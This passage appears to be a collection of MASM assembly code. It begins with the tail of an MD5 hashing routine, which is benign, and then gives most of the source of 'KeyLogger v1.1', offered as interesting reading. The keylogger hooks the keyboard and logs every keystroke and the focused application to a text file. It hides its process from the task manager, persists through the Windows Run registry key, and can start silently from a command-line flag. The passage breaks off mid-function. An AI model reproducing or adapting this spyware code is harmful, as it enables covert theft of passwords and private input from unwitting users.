ebx,dtc mov ecx,dtd ; F(x,y,z) = (x and y) or ((not x) and z) and ebx,eax not eax and eax,ecx or eax,ebx add eax,dta add eax,x add eax,t mov cl,s rol eax,cl add eax,dtb mov dta,eax ENDM GG MACRO dta,dtb,dtc,dtd,x,s,t ; a = b + ((a + G(b,c,d) + x + t) << s) mov eax,dtb mov ebx,dtc mov ecx,dtd ; G(x,y,z) = (x and z) or (y and (not z)) and eax,ecx not ecx and ecx,ebx or eax,ecx add eax,dta add eax,x add eax,t mov cl,s rol eax,cl add eax,dtb mov dta,eax ENDM HH MACRO dta,dtb,dtc,dtd,x,s,t ; a = b + ((a + H(b,c,d) + x + t) << s) mov eax,dtb mov ebx,dtc mov ecx,dtd ; H(x,y,z) = x xor y xor z xor eax,ebx xor eax,ecx add eax,dta add eax,x add eax,t mov cl,s rol eax,cl add eax,dtb mov dta,eax ENDM II MACRO dta,dtb,dtc,dtd,x,s,t ; a = b + ((a + I(b,c,d) + x + t) << s) mov eax,dtb mov ebx,dtc mov ecx,dtd ; I(x,y,z) = y xor (x or (not z)) not ecx or eax,ecx xor eax,ebx add eax,dta add eax,x add eax,t mov cl,s rol eax,cl add eax,dtb mov dta,eax ENDM .code MD5hash proc uses eax ebx ecx edx edi esi,ptBuffer:dword,dtBufferLength:dword,ptMD5Result:dword local dta:dword,dtb:dword,dtc:dword,dtd:dword ; phase I · padding mov edi,ptBuffer mov eax,dtBufferLength inc eax add edi,eax mov byte ptr [edi-1],080h xor edx,edx mov ebx,64 div ebx neg edx add edx,64 cmp edx,8 jae @f add edx,64 @@: mov ecx,edx xor al,al rep stosb mov eax,dtBufferLength inc edx add dtBufferLength,edx xor edx,edx mov ebx,8 mul ebx mov dword ptr [edi-8],eax mov dword ptr [edi-4],edx mov edx,dtBufferLength mov edi,ptBuffer ; phase II · chaining variables initialization mov esi,ptMD5Result assume esi:ptr MD5RESULT mov [esi].dtA,067452301h mov [esi].dtB,0efcdab89h mov [esi].dtC,098badcfeh mov [esi].dtD,010325476h ; phase III · hashing hashloop: mov eax,[esi].dtA mov dta,eax mov eax,[esi].dtB mov dtb,eax mov eax,[esi].dtC mov dtc,eax mov eax,[esi].dtD mov dtd,eax ; round 1 FF dta,dtb,dtc,dtd,dword ptr [edi+00*4],07,0d76aa478h FF dtd,dta,dtb,dtc,dword ptr [edi+01*4],12,0e8c7b756h FF dtc,dtd,dta,dtb,dword ptr [edi+02*4],17,0242070dbh FF dtb,dtc,dtd,dta,dword ptr [edi+03*4],22,0c1bdceeeh FF dta,dtb,dtc,dtd,dword ptr [edi+04*4],07,0f57c0fafh FF dtd,dta,dtb,dtc,dword ptr [edi+05*4],12,04787c62ah FF dtc,dtd,dta,dtb,dword ptr [edi+06*4],17,0a8304613h FF dtb,dtc,dtd,dta,dword ptr [edi+07*4],22,0fd469501h FF dta,dtb,dtc,dtd,dword ptr [edi+08*4],07,0698098d8h FF dtd,dta,dtb,dtc,dword ptr [edi+09*4],12,08b44f7afh FF dtc,dtd,dta,dtb,dword ptr [edi+10*4],17,0ffff5bb1h FF dtb,dtc,dtd,dta,dword ptr [edi+11*4],22,0895cd7beh FF dta,dtb,dtc,dtd,dword ptr [edi+12*4],07,06b901122h FF dtd,dta,dtb,dtc,dword ptr [edi+13*4],12,0fd987193h FF dtc,dtd,dta,dtb,dword ptr [edi+14*4],17,0a679438eh FF dtb,dtc,dtd,dta,dword ptr [edi+15*4],22,049b40821h ; round 2 GG dta,dtb,dtc,dtd,dword ptr [edi+01*4],05,0f61e2562h GG dtd,dta,dtb,dtc,dword ptr [edi+06*4],09,0c040b340h GG dtc,dtd,dta,dtb,dword ptr [edi+11*4],14,0265e5a51h GG dtb,dtc,dtd,dta,dword ptr [edi+00*4],20,0e9b6c7aah GG dta,dtb,dtc,dtd,dword ptr [edi+05*4],05,0d62f105dh GG dtd,dta,dtb,dtc,dword ptr [edi+10*4],09,002441453h GG dtc,dtd,dta,dtb,dword ptr [edi+15*4],14,0d8a1e681h GG dtb,dtc,dtd,dta,dword ptr [edi+04*4],20,0e7d3fbc8h GG dta,dtb,dtc,dtd,dword ptr [edi+09*4],05,021e1cde6h GG dtd,dta,dtb,dtc,dword ptr [edi+14*4],09,0c33707d6h GG dtc,dtd,dta,dtb,dword ptr [edi+03*4],14,0f4d50d87h GG dtb,dtc,dtd,dta,dword ptr [edi+08*4],20,0455a14edh GG dta,dtb,dtc,dtd,dword ptr [edi+13*4],05,0a9e3e905h GG dtd,dta,dtb,dtc,dword ptr [edi+02*4],09,0fcefa3f8h GG dtc,dtd,dta,dtb,dword ptr [edi+07*4],14,0676f02d9h GG dtb,dtc,dtd,dta,dword ptr [edi+12*4],20,08d2a4c8ah ; round 3 HH dta,dtb,dtc,dtd,dword ptr [edi+05*4],04,0fffa3942h HH dtd,dta,dtb,dtc,dword ptr [edi+08*4],11,08771f681h HH dtc,dtd,dta,dtb,dword ptr [edi+11*4],16,06d9d6122h HH dtb,dtc,dtd,dta,dword ptr [edi+14*4],23,0fde5380ch HH dta,dtb,dtc,dtd,dword ptr [edi+01*4],04,0a4beea44h HH dtd,dta,dtb,dtc,dword ptr [edi+04*4],11,04bdecfa9h HH dtc,dtd,dta,dtb,dword ptr [edi+07*4],16,0f6bb4b60h HH dtb,dtc,dtd,dta,dword ptr [edi+10*4],23,0bebfbc70h HH dta,dtb,dtc,dtd,dword ptr [edi+13*4],04,0289b7ec6h HH dtd,dta,dtb,dtc,dword ptr [edi+00*4],11,0eaa127fah HH dtc,dtd,dta,dtb,dword ptr [edi+03*4],16,0d4ef3085h HH dtb,dtc,dtd,dta,dword ptr [edi+06*4],23,004881d05h HH dta,dtb,dtc,dtd,dword ptr [edi+09*4],04,0d9d4d039h HH dtd,dta,dtb,dtc,dword ptr [edi+12*4],11,0e6db99e5h HH dtc,dtd,dta,dtb,dword ptr [edi+15*4],16,01fa27cf8h HH dtb,dtc,dtd,dta,dword ptr [edi+02*4],23,0c4ac5665h ; round 4 II dta,dtb,dtc,dtd,dword ptr [edi+00*4],06,0f4292244h II dtd,dta,dtb,dtc,dword ptr [edi+07*4],10,0432aff97h II dtc,dtd,dta,dtb,dword ptr [edi+14*4],15,0ab9423a7h II dtb,dtc,dtd,dta,dword ptr [edi+05*4],21,0fc93a039h II dta,dtb,dtc,dtd,dword ptr [edi+12*4],06,0655b59c3h II dtd,dta,dtb,dtc,dword ptr [edi+03*4],10,08f0ccc92h II dtc,dtd,dta,dtb,dword ptr [edi+10*4],15,0ffeff47dh II dtb,dtc,dtd,dta,dword ptr [edi+01*4],21,085845dd1h II dta,dtb,dtc,dtd,dword ptr [edi+08*4],06,06fa87e4fh II dtd,dta,dtb,dtc,dword ptr [edi+15*4],10,0fe2ce6e0h II dtc,dtd,dta,dtb,dword ptr [edi+06*4],15,0a3014314h II dtb,dtc,dtd,dta,dword ptr [edi+13*4],21,04e0811a1h II dta,dtb,dtc,dtd,dword ptr [edi+04*4],06,0f7537e82h II dtd,dta,dtb,dtc,dword ptr [edi+11*4],10,0bd3af235h II dtc,dtd,dta,dtb,dword ptr [edi+02*4],15,02ad7d2bbh II dtb,dtc,dtd,dta,dword ptr [edi+09*4],21,0eb86d391h mov eax,dta add [esi].dtA,eax mov eax,dtb add [esi].dtB,eax mov eax,dtc add [esi].dtC,eax mov eax,dtd add [esi].dtD,eax add edi,64 sub edx,64 jnz hashloop ; phase IV · results mov ecx,4 @@: mov eax,dword ptr [esi] xchg al,ah rol eax,16 xchg al,ah mov dword ptr [esi],eax add esi,4 loop @b ret MD5hash endp Download: http://win32assembly.online.fr/files/md5asm.zip

KeyLogger v1.1 by J. Daniel Pino Old stuff... Cu Keyboard Hook, e interesant, bine de uitat peste el. ;************************************************************************************************ ;KeyLogger v1.1 by J. Daniel Pino - ; ;Daniel_2ar@hotmail.com ;Daniel_2ar@yahoo.com ;Daniel_2@speedy.com.ar ;Daniel_2@data54.com ; ;I hope you find this stuff useful! ;************************************************************************************************ .386 .MODEL FLAT, STDCALL OPTION CASEMAP:NONE ;******************************************************************************************************************* ;Includes ;******************************************************************************************************************* INCLUDE C:\MASM32\INCLUDE\WINDOWS.INC INCLUDE C:\MASM32\INCLUDE\KERNEL32.INC INCLUDE C:\MASM32\INCLUDE\USER32.INC INCLUDE C:\MASM32\INCLUDE\COMCTL32.INC INCLUDE C:\MASM32\INCLUDE\ADVAPI32.INC INCLUDE C:\MASM32\INCLUDE\MASM32.INC INCLUDE C:\KeyLogV1-1_source_code\HKL_DLL\HKL.INC INCLUDELIB C:\MASM32\LIB\KERNEL32.LIB INCLUDELIB C:\MASM32\LIB\USER32.LIB INCLUDELIB C:\MASM32\LIB\COMCTL32.LIB INCLUDELIB C:\MASM32\LIB\ADVAPI32.LIB INCLUDELIB C:\MASM32\LIB\MASM32.LIB INCLUDELIB C:\KeyLogV1-1_source_code\HKL_DLL\HKL.LIB ;******************************************************************************************************************* ; Prototypes ;******************************************************************************************************************* dlgmain PROTO :DWORD, :DWORD, :DWORD, :DWORD RunParameters PROTO addr_cmd_params:DWORD CreateLogFile PROTO SetFilePath PROTO WriteDateStamp PROTO GetDateStamp PROTO addr_buffer:DWORD WriteAppInfoHeader PROTO appnamelen:DWORD WriteKeyPressed PROTO virtualkeycode:DWORD TranslateVirtualKeyCode PROTO virtualkeycode:DWORD, addr_buffer:DWORD dlgabout PROTO :DWORD, :DWORD, :DWORD, :DWORD HideProcess PROTO ;******************************************************************************************************************* ; Macros ;******************************************************************************************************************* ;This macro search a char in a string. If it finds it, returns in EAX the address of the char ;in the string; else, returns NULL in EAX. ; ;Esta macro busca un caracter en una cadena. Si lo encuentra, devuelve en EAX la direccion ;donde se encuentra el caracter en la cadena; de lo contrario, devuelve NULL en EAX. ;******************************************************************************************************************* FindCharInStr MACRO char_to_find:REQ, p_string:REQ, len_string:REQ LOCAL not_found, return CLD MOV AL, char_to_find MOV ECX, len_string PUSH EDI MOV EDI, p_string REPNE SCASB JNZ not_found DEC EDI MOV EAX, EDI POP EDI JMP return not_found: POP EDI XOR EAX, EAX return: ENDM ;******************************************************************************************************************* .DATA ;******************************************************************************************************************* classname DB "Daniel", 0 dlgname DB "Daniel", 0 CommandLine LPSTR 0 aboutdlgname DB "ABOUTDLG", 0 err_cap DB "Error", 0 err0 DB "Error while trying to install hook.", 0 err1 DB "Error while trying to uninstall hook.", 0 previnstance_err DB "Only one instance of KeyLog can run at a time.", 0 previnstance_cap DB "KeyLog V1.1", 0 button0_cap0 DB "Activate", 0 button0_cap1 DB "Deactivate", 0 ;En la siguiente variable se almacenara la direccion de la ruta y nombre de la aplicacion sobre ;la cual se esta tipeando addr_app_name DWORD 0 ;En la siguiente matriz de bytes se almacenara la ruta y nombre de la aplicacion que tenia el ;foco prev_app_name DB 300 DUP (0) ;Esta variable determina el estado del programa (visible (1) - oculto (0)) hidden_mode DWORD 1 ;--------------------------------------- ;Variables para el archivo de registro ;--------------------------------------- h_keylogfile DWORD 0 keylogfilepath DB "X:\Klgf.txt", 0 keylogfile_err DB "Unable to create log file. KeyLogger will exit now", 0 keylogfilestamp DB "KeyLog Version 1.1 - Started on: ", 0 keylogfilestok DWORD TRUE keylogfilebuff DB 200 DUP (0) arethereparameters DWORD 0; cmd_token DB "-", 0 date DB "MMMM',' dddd dd yyyy", 0 time DB "hh':'mm tt", 0 line_1 DB "**************************************************",0 line_2 DB "--------------------------------------------------", 0 infoheader_f1 DB "Application: ", 0 infoheader_f2 DB "got focus on: ", 0 infoheader_f3 DB "user type: ", 0 first_app_hooked DWORD TRUE ;--------------------------------------- ;Windows' registry variables ;Variables para el registro de Windows ;--------------------------------------- h_regkey DWORD 0 subkey DB "Software\Microsoft\Windows\CurrentVersion\run", 0 subkey_descrp DB "KeyLogRegEntry", 0 keylog_params DB "-ah", 0 ;------------------------------------- ;Strings for special keys ;Cadenas para las teclas especiales ;------------------------------------- k_escape DB "[ESC]", 0 k_tab DB "[TAB]", 0 k_f1 DB "[F1]", 0 k_f2 DB "[F2]", 0 k_f3 DB "[F3]", 0 k_f4 DB "[F4]", 0 k_f5 DB "[F5]", 0 k_f6 DB "[F6]", 0 k_f7 DB "[F7]", 0 k_f8 DB "[F8]", 0 k_f9 DB "[F9]", 0 k_f10 DB "[F10]", 0 k_f11 DB "[F11]", 0 k_f12 DB "[F12]", 0 k_printscreen DB "[PRINTSCREEN]", 0 k_scrolllock DB "[SCROLLLOCK]", 0 k_break DB "[BREAK]", 0 k_insert DB "[INSERT]", 0 k_home DB "[HOME]", 0 k_pageup DB "[PAGEUP]", 0 k_delete DB "[DELETE]", 0 k_end DB "[END]", 0 k_pagedown DB "[PAGEDOWN]", 0 k_back DB "[BACK]", 0 k_capslock DB "[CAPSLOCK]", 0 k_numlock DB "[NUMLOCK]", 0 k_shift DB "[SHIFT]", 0 k_control DB "[CONTROL]", 0 k_alt DB "[ALT]", 0 k_left DB "[LEFT]", 0 k_up DB "[UP]", 0 k_right DB "[RIGHT]", 0 k_down DB "[DOWN]", 0 k_numpad0 DB "[NUMPAD 0]", 0 k_numpad1 DB "[NUMPAD 1]", 0 k_numpad2 DB "[NUMPAD 2]", 0 k_numpad3 DB "[NUMPAD 3]", 0 k_numpad4 DB "[NUMPAD 4]", 0 k_numpad5 DB "[NUMPAD 5]", 0 k_numpad6 DB "[NUMPAD 6]", 0 k_numpad7 DB "[NUMPAD 7]", 0 k_numpad8 DB "[NUMPAD 8]", 0 k_numpad9 DB "[NUMPAD 9]", 0 k_unknown DB "[UNKNOWN]", 0 kernel_name DB "KERNEL32.DLL", 0 kernel_function DB "RegisterServiceProcess", 0 buffer DB 100 DUP (0) ;******************************************************************************************************************* .DATA? ;******************************************************************************************************************* hInstance DWORD ? h_Dlg DWORD ? hButton0 DWORD ? hButton1 DWORD ? ;*************************************************** ;Controls' handles variables ;Variables para los manejadores de los controles ;*************************************************** ;Push buttons ;--------------------------------------------------- h_IDC_BUTTON0 DWORD ? h_IDC_BUTTON1 DWORD ? ;******************************************************************************************************************* .CONST ;******************************************************************************************************************* ;Push buttons ;--------------------------------------------------- IDC_BUTTON0 EQU 400 IDC_BUTTON1 EQU 401 IDC_BUTTON2 EQU 402 IDC_BUTTON3 EQU 403 IDC_CHECK00 EQU 500 ;--------------------------------------------------- ;User messages ;Mensajes personalizados ;--------------------------------------------------- WM_KEYSTROKE EQU WM_USER + 2 WM_KEYLOGMSG EQU WM_USER + 3 ;******************************************************************************************************************* .CODE ;******************************************************************************************************************* start: INVOKE GetModuleHandle, NULL MOV hInstance, EAX INVOKE GetCommandLine INVOKE dlgmain, hInstance, NULL, NULL, SW_SHOWDEFAULT INVOKE ExitProcess, 0 ;******************************************************************************************************************* ;******************************************************************************************************************* dlgmain PROC hInst:HINSTANCE, hPrevInst:HINSTANCE, CmdLine:LPSTR, CmdShow:DWORD LOCAL wc:WNDCLASSEX, msg:MSG, hDlg:HWND, cmd_params[50]:BYTE; ;--------------------------------------------------------------------- ;We check whether an instance of this program is already running ;Se determina si ya se esta ejecutando una instancia del programa ;--------------------------------------------------------------------- INVOKE FindWindow, ADDR classname, NULL .IF EAX != NULL INVOKE MessageBox, NULL, ADDR previnstance_err, ADDR previnstance_cap, MB_ICONERROR INVOKE ExitProcess, NULL .ENDIF MOV wc.cbSize, SIZEOF WNDCLASSEX MOV wc.style, CS_HREDRAW or CS_VREDRAW MOV wc.lpfnWndProc, OFFSET dlgproc MOV wc.cbClsExtra, NULL MOV wc.cbWndExtra, DLGWINDOWEXTRA PUSH hInst POP wc.hInstance MOV wc.hbrBackground, COLOR_BTNFACE+1 MOV wc.lpszMenuName, NULL MOV wc.lpszClassName, OFFSET classname INVOKE LoadIcon, hInst, NULL MOV wc.hIcon, EAX MOV wc.hIconSm, EAX INVOKE LoadCursor, NULL, IDC_ARROW MOV wc.hCursor, EAX INVOKE RegisterClassEx, addr wc INVOKE CreateDialogParam, hInstance, ADDR dlgname, NULL, NULL, NULL MOV hDlg, EAX MOV h_Dlg, EAX INVOKE InitCommonControls ;Se obtiene el manejador del boton "Hide" INVOKE GetDlgItem, h_Dlg, IDC_BUTTON1 MOV h_IDC_BUTTON1, EAX ;Se intentara esconder el programa de la lista de procesos de Windows ;We'll try to hide the program from the Windows' task manager INVOKE HideProcess ;--------------------------------------------------------------------- ; We check whether the program should be run at Windows' start up ; Se determina si el programa se ejecuta el iniciar Windows ;--------------------------------------------------------------------- ;The registry key is open to check whether it is already created ;Se abre la clave para determinar la existencia de la subclave INVOKE RegOpenKeyEx, HKEY_LOCAL_MACHINE, ADDR subkey, NULL, KEY_ALL_ACCESS, ADDR h_regkey .IF EAX == ERROR_SUCCESS ;If it is ;we look for the subkey INVOKE RegQueryValueEx, h_regkey, ADDR subkey_descrp, NULL, NULL, NULL, NULL .IF EAX == ERROR_SUCCESS ;If it does exist ;Se tilda el boton AUTOCHECKBOX INVOKE CheckDlgButton, hDlg, IDC_CHECK00, BST_CHECKED .ENDIF ;The key is closed INVOKE RegCloseKey, h_regkey .ENDIF ;--------------------------------------------------------------------- ; We take out the application path in the command line the in order ; to get the parameters only ; Se limpia la linea de comandos por posibles parametros ;--------------------------------------------------------------------- INVOKE GetCommandLine MOV CommandLine, EAX INVOKE StripRangeI, CommandLine, ADDR cmd_params, 22h, 22h ;Any parameter found in the command line is executed ;Se ejecuta cualquier parametro en la linea de comandos ;y se determina si se muestra o no la ventana INVOKE RunParameters, ADDR cmd_params ;--------------------------------------------------------------------- .WHILE TRUE INVOKE GetMessage, ADDR msg,NULL,0,0 .BREAK .IF (!EAX) ;Si EAX = 0 INVOKE IsDialogMessage, hDlg, ADDR msg .IF EAX == FALSE INVOKE TranslateMessage, ADDR msg INVOKE DispatchMessage, ADDR msg .ENDIF .ENDW MOV EAX, msg.wParam RET dlgmain ENDP ;******************************************************************************************************************* ;Este funcion se encarga de recibir, interpretar y actuar de acuerdo a los mensajes que le ;corresponan. ;******************************************************************************************************************* dlgproc PROC hDlg:HWND, uMsg:UINT, wParam:WPARAM, lParam:LPARAM LOCAL temp_buffer:DWORD .IF uMsg == WM_DESTROY ;Se cierra el archivo de registro INVOKE CloseHandle, h_keylogfile INVOKE PostQuitMessage, NULL .ELSEIF uMsg == WM_COMMAND MOV EAX, wParam .IF AX == IDC_BUTTON0 SHR EAX, 16 .IF AX == BN_CLICKED INVOKE GetCurrentState .IF EAX == 0 INVOKE CreateLogFile .IF EAX != 0 INVOKE MessageBox, hDlg, ADDR keylogfile_err, ADDR err_cap, MB_ICONERROR ;Se termina el programa INVOKE ExitProcess, NULL .ENDIF INVOKE StartKeyLogHooking, hDlg .IF EAX == -1 INVOKE MessageBox, hDlg, ADDR err0, ADDR err_cap, MB_ICONERROR .ELSE ;Se guarda la direccion del buffer que devuelve la funcion ;ya que es alli donde se almacenara el nombre de la ;aplicacion sobre la cual se esta tipeando MOV addr_app_name, EAX ;Se cambia el titulo del boton "Activar" por "Desactivar" INVOKE SendDlgItemMessage, hDlg, IDC_BUTTON0, WM_SETTEXT, NULL, ADDR button0_cap1 .ENDIF ;The Hide button is disabled INVOKE EnableWindow, h_IDC_BUTTON1, TRUE .ELSEIF EAX == 1 ;Se cierra el archivo de registro INVOKE CloseHandle, h_keylogfile INVOKE StopKeyLogHooking .IF EAX == -1 INVOKE MessageBox, hDlg, ADDR err1, ADDR err_cap, MB_ICONERROR .ELSE INVOKE SendDlgItemMessage, hDlg, IDC_BUTTON0, WM_SETTEXT, NULL, ADDR button0_cap0 .ENDIF ;The Hide button is disabled INVOKE EnableWindow, h_IDC_BUTTON1, NULL .ENDIF .ENDIF .ELSEIF AX == IDC_BUTTON1 INVOKE ShowWindow, hDlg, SW_HIDE AND hidden_mode, 0 .ELSEIF AX == IDC_BUTTON2 SHR EAX, 16 .IF AX == BN_CLICKED INVOKE DialogBoxParam, hInstance, ADDR aboutdlgname, hDlg, OFFSET dlgabout, NULL .ENDIF .ELSEIF AX == IDC_CHECK00 SHR EAX, 16 .IF AX == BN_CLICKED INVOKE IsDlgButtonChecked, hDlg, IDC_CHECK00 .IF EAX == BST_CHECKED AND temp_buffer, 0 ;Se determina la ruta donde se encuentra este programa INVOKE GlobalAlloc, GPTR, 1000 MOV temp_buffer, EAX INVOKE GetCommandLine INVOKE lstrcpy, temp_buffer, EAX INVOKE szCatStr, temp_buffer, ADDR keylog_params ;Se crea o abre la clave en el registro INVOKE RegCreateKeyEx, HKEY_LOCAL_MACHINE, ADDR subkey, NULL, NULL, REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, NULL, ADDR h_regkey, NULL INVOKE lstrlen, temp_buffer ;We set the subkey values ;Se establecen los valores de la subclave INVOKE RegSetValueEx, h_regkey, ADDR subkey_descrp, NULL, REG_SZ, temp_buffer, EAX ;The memory is deallocated ;Se libera la memoria INVOKE GlobalFree, temp_buffer ;The key is closed INVOKE RegCloseKey, h_regkey .ELSE ;The key is open in order to delete the subkey ;Se abre la clave para luego eliminar la subclave INVOKE RegOpenKeyEx, HKEY_LOCAL_MACHINE, ADDR subkey, NULL, KEY_ALL_ACCESS, ADDR h_regkey .IF EAX == ERROR_SUCCESS ;Si la clave existe ;Se elimina la subclave INVOKE RegDeleteValue, h_regkey, ADDR subkey_descrp ;The key is closed INVOKE RegCloseKey, h_regkey .ENDIF .ENDIF .ENDIF .ENDIF .ELSEIF uMsg == WM_KEYLOGMSG .IF hidden_mode == 1 INVOKE ShowWindow, hDlg, SW_HIDE AND hidden_mode, 0 .ELSE INVOKE ShowWindow, hDlg, SW_SHOW MOV hidden_mode, 1 ;We put the KeyLog's windows on top INVOKE SetForegroundWindow, hDlg .ENDIF .ELSEIF uMsg == WM_KEYSTROKE ;Applications' names are compared so that we can determine whether ;a new application has the focus INVOKE lstrcmp, ADDR prev_app_name, addr_app_name .IF EAX != 0 ;The info header is written for the new application that ;got the focus INVOKE WriteAppInfoHeader, lParam ;The new application's name is stored for subsequent comparisons INVOKE lstrcpy, ADDR prev_app_name, addr_app_name .ENDIF ;The procedure which will write the key pressed into the file is invoked INVOKE WriteKeyPressed, wParam .ELSE INVOKE DefWindowProc, hDlg, uMsg, wParam, lParam RET .ENDIF XOR EAX, EAX RET dlgproc ENDP ;******************************************************************************************************************* ;This procedure examines and executes any parameters passed to the program when it was run. ;Este procedimiento examina y ejecuta los distintos parametros que puden pasarse al programa ;en el momento de su ejecucion. ;******************************************************************************************************************* RunParameters PROC USES EBX addr_cmd_params:DWORD ;Se examina la linea de comando en busca del token (" -") de parametros MOV EBX, addr_cmd_params MOV AX, WORD PTR [EBX] .IF AX != "- " ;Si no se encuentra el guion que antecede a los parametros JMP quit .ENDIF ;------------------------------------------------------------------------------ ;"Activate" parameter ('a') ;------------------------------------------------------------------------------ ;Se busca el parametro 'a' (activate) FindCharInStr 'a', addr_cmd_params, 49 .IF EAX != NULL INVOKE CreateLogFile .IF EAX != 0 INVOKE MessageBox, h_Dlg, ADDR keylogfile_err, ADDR err_cap, MB_ICONERROR ;The program is finished INVOKE ExitProcess, NULL .ENDIF INVOKE StartKeyLogHooking, h_Dlg .IF EAX == -1 INVOKE MessageBox, h_Dlg, ADDR err0, ADDR err_cap, MB_ICONERROR .ELSE ;We save the address of the buffer returned by the function ;since it's there where the application's name onto which the ;user is typing will be stored ;Se guarda la direccion del buffer que devuelve la funcion ;ya que es alli donde se almacenara el nombre de la ;aplicacion sobre la cual se esta tipeando MOV addr_app_name, EAX ;We change the button caption from "Activate" to "Deactivate" ;Se cambia el titulo del boton "Activar" por "Desactivar" INVOKE SendDlgItemMessage, h_Dlg, IDC_BUTTON0, WM_SETTEXT, NULL, ADDR button0_cap1 .ENDIF ;The Hide button is disabled INVOKE EnableWindow, h_IDC_BUTTON1, TRUE ;------------------------------------------------------------------------------ ;"Hide" parameter('h') ;------------------------------------------------------------------------------ ;We look for paramter 'h' (hide) ;Se busca el parametro 'h' (hide) FindCharInStr 'h', addr_cmd_params, 49 .IF EAX != NULL RET .ENDIF ;------------------------------------------------------------------------------ .ENDIF quit: INVOKE ShowWindow, h_Dlg, SW_SHOWNORMAL INVOKE UpdateWindow, h_Dlg RET RunParameters ENDP ;******************************************************************************************************************* ;This function creates the file (or opens the existing one) which will store all the keys ;being pressed, along with any other info of the application that got the focus. ;If it success, return NULL; else, returns -1 (0FFFFFFFFh). ;Esta funcion se encarga de crear el archivo (o abrir el existente) donde se escribira el ;registro de las teclas pulsadas junto con algunos datos de la aplicacion que tiene el foco. ;Si tuvo exito, devuelve cero; de lo contrario, devuelve -1 (0FFFFFFFFh). ;******************************************************************************************************************* CreateLogFile PROC ;We set the application path ;Se establece la ruta del archivo INVOKE SetFilePath ;The registry file is created, or the existing one is open ;Se crea o se abre el archivo de registro donde se almacenaran los datos INVOKE CreateFile, ADDR keylogfilepath, GENERIC_READ OR GENERIC_WRITE, NULL, NULL, OPEN_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL .IF EAX == INVALID_HANDLE_VALUE MOV EAX, -1 RET .ENDIF ;The file's handle is saved ;Se guarda el manejador del archivo MOV h_keylogfile, EAX ;If the keyboard login is started, write DateStamp ;Si se inicia la apliacion, escribir el DateStamp .IF keylogfilestok == TRUE INVOKE WriteDateStamp .ENDIF XOR EAX, EAX RET CreateLogFile ENDP ;******************************************************************************************************************* ;This function determines the path of the registry file by checking all the drives available ;in the system. ;Esta funcion determina la ruta del archivo de registro del programa (KlgF.txt) examinando ;las unidades disponibles en el sistema ;******************************************************************************************************************* SetFilePath PROC USES EBX LOCAL driver_letter[4]:BYTE MOV DWORD PTR [driver_letter], " \:C" AND driver_letter[3], 0 INVOKE GetLogicalDrives MOV EBX, EAX SHR EBX, 2 ;Skip test for drives A: & B: .WHILE EBX > 0 SHR EBX, 1 INVOKE GetDriveType, ADDR driver_letter .IF EAX == DRIVE_FIXED .BREAK .ENDIF INC driver_letter .ENDW MOV AL, BYTE PTR [driver_letter] MOV BYTE PTR [keylogfilepath], AL RET SetFilePath ENDP ;******************************************************************************************************************* ;This procedure writes the session header every time the program is run. ;Este procedimiento se encarga de escribir el encabezado de sesion del programa cada vez que se ;ejecuta. ;******************************************************************************************************************* WriteDateStamp PROC LOCAL bytes_written:DWORD, temp:DWORD AND temp, 0 ;If the program is run for the first time, write DateStamp ;Si se ejecuta la primera vez el programa, escribir el DateStamp .IF keylogfilestok == TRUE ;The file pointer is set to the end of the file in order to avoid ;overwriting any other data ;Se posiciona el puntero del archivo final para evitar sobreescribir los ;datos que pueda tener INVOKE SetFilePointer, h_keylogfile, NULL, NULL, FILE_END ;We write the Enter key chars ;Se escribe el Enter mas el retorno de carro MOV EBX, OFFSET keylogfilebuff MOV WORD PTR [EBX], 0A0Dh INVOKE WriteFile, h_keylogfile, ADDR keylogfilebuff, 2, ADDR bytes_written, NULL ;An asterisk-line separator is written ;Se escribe la linea separadora de asteriscos INVOKE WriteFile, h_keylogfile, ADDR line_1, 50, ADDR bytes_written, NULL INVOKE WriteFile, h_keylogfile, ADDR line_1, 50, ADDR bytes_written, NULL ;We write the Enter key chars (0Dh - 0Ah) ;Se escribe el Enter mas el retorno de carro MOV EBX, OFFSET keylogfilebuff MOV WORD PTR [EBX], 0A0Dh INVOKE WriteFile, h_keylogfile, ADDR keylogfilebuff, 2, ADDR bytes_written, NULL ;KeyLog header ;Encabezado de presentacion INVOKE WriteFile, h_keylogfile, ADDR keylogfilestamp, 33, ADDR bytes_written, NULL INVOKE GetDateStamp, ADDR keylogfilebuff MOV temp, EAX INVOKE WriteFile, h_keylogfile, ADDR keylogfilebuff, temp, ADDR bytes_written, NULL ;We write the Enter key chars (0Dh - 0Ah) ;Se escribe el Enter mas el retorno de carro MOV EBX, OFFSET keylogfilebuff MOV WORD PTR [EBX], 0A0Dh INVOKE WriteFile, h_keylogfile, ADDR keylogfilebuff, 2, ADDR bytes_written, NULL ;An asterisk-line separator is written ;Se escribe la linea separadora de asteriscos INVOKE WriteFile, h_keylogfile, ADDR line_1, 50, ADDR bytes_written, NULL INVOKE WriteFile, h_keylogfile, ADDR line_1, 50, ADDR bytes_written, NULL ;The keylogfilestok variable is reset in order not to write the KeyLog ;header again ;Se resetea la variable para que no se vuelva a escribir el DateStamp AND keylogfilestok, 0 .ENDIF RET WriteDateStamp ENDP ;******************************************************************************************************************* ;This function stores into the buffer (whose address is received as a parameter) the string ;of the date and time. Returns the length of that string. ;Esta funcion se encarga de almacenar en el buffer (cuya direccion recibe como parametro) ;los caracteres correspondientes a la fecha y hora. Devuelve el largo de la cadena en EAX. ;******************************************************************************************************************* GetDateStamp PROC addr_buffer:DWORD LOCAL cont:DWORD ;The local variable cont is reset ;Se resetea la variable local AND cont, 0 ;-------------- ; Date ;-------------- INVOKE GetDateFormat, NULL, NULL, NULL, ADDR date, addr_buffer, 200 ;EAX is decremented in one in order not to include the NULL character of the ;string DEC EAX ADD cont, EAX ;A separator is written ;Se escribe un separador ADD addr_buffer, EAX MOV EBX, addr_buffer MOV BYTE PTR [EBX], ' ' INC addr_buffer INC cont MOV WORD PTR [EBX +1], ' -' INC cont INC cont INC addr_buffer INC addr_buffer ;-------------- ; Time ;-------------- INVOKE GetTimeFormat, NULL, NULL, NULL, ADDR time, addr_buffer, 200 ;EAX is decremented in one in order not to include the NULL character of the ;string ;Se decrementa en 1 EAX para que no quede incluido el cero de fin de cadena ;en la cadena de texto DEC EAX ADD addr_buffer, EAX ADD cont, EAX MOV EAX, cont RET GetDateStamp ENDP ;******************************************************************************************************************* ;This procedure writes the info header in the KeyLog file. It's invoked whenever an application ;gets the focus. ;******************************************************************************************************************* WriteAppInfoHeader PROC appnamelen:DWORD LOCAL bytes_written:DWORD, temp:DWORD ;The file pointer is set to the end of the file in order to avoid ;overwriting any other data ;Se posiciona el 